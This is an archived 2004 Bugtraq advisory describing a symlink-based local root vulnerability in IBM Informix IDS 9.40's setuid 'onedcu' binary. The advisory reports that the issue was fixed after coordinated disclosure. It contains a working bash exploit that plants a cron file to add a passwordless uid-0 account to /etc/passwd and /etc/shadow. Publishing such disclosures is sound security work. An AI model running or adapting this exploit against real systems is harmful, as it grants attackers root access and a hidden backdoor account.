lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 29 Jan 2004 10:16:05 +0100 (CET)
From: pask@...n3s.com
To: bugtraq@...urityfocus.com
Subject: ----------========== OPEN3S-2003-08-08-eng-informix-onedcu
 ==========----------



	
	----------========== OPEN3S-2003-08-08-eng-informix-onedcu ==========----------

 Title:    Local Vulnerability in IBM Informix IDSv9.40 onedcu binary
 Date:     08-08-2003
 Platform: Only tested in Linux but can be exported to others.
 Impact:   Users with exec perm over ./bin/onedcu can create files 
	   with 666 mode and owned by root.
 Author:   Juan Manuel Pascual Escriba <pask@...n3s.com>
 Status:   Solved by IBM Corp.


PROBLEM SUMMARY:

 There is a write permisions checking error in onedcu binary that can be used by local
users with exec perm over onedcu to write any file owned by root with mode 666. 


DESCRIPTION

onedcu is installed with 6755 perm and owned by root.informix in my default installation

[informix@...oni onedcu]$ ls -alc /home/informix-9.40/bin/onedcu
-rwsr-sr-x    1 root     informix  1066468 Aug  8 23:39 /home/informix-9.40/bin/onedcu


The binary does'nt drop privileges before writing the log and writes \001 file owned by root:


IMPACT:

	Easy to overwrite or create new files owned by root (.rhosts, cron files) via link 
injection.

EXPLOIT

#!/bin/bash

ONEDCU=/home/informix-9.40/bin/onedcu
CRONFILE=/etc/cron.hourly/pakito
USER=pakito
DIR=./trash

export INFORMIXDIR=/home/informix-9.40/
export ONCONFIG=onconfig.std

        if [ -d $DIR ]; then
                echo Trash directory already created
        else
                mkdir $DIR
        fi

cd $DIR
        if [ -f ./"\001" ]; then
                echo Link Already Created
        else
                ln -s $CRONFILE `echo -e "\001"`
        fi

umask 000
$ONEDCU &
kill -9 `pidof $ONEDCU`


echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo " "
echo "  This vulnerability was researched by Juan Manuel Pascual Escriba"
echo "  08/08/2003 Barcelona - Spain pask@...n3s.com
echo " "
echo "  must wait until cron execute $CRONFILE and then exec su pakito"



STATUS 

Reported to IBM security team at 11th of August 2003

See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336

This vulnerability was managed in an efficient manner by Jonathan Leffler 
from IBM Informix Database Engineering Team.


--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@...n3s.com
Barcelona - Spain                      http://www.open3s.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ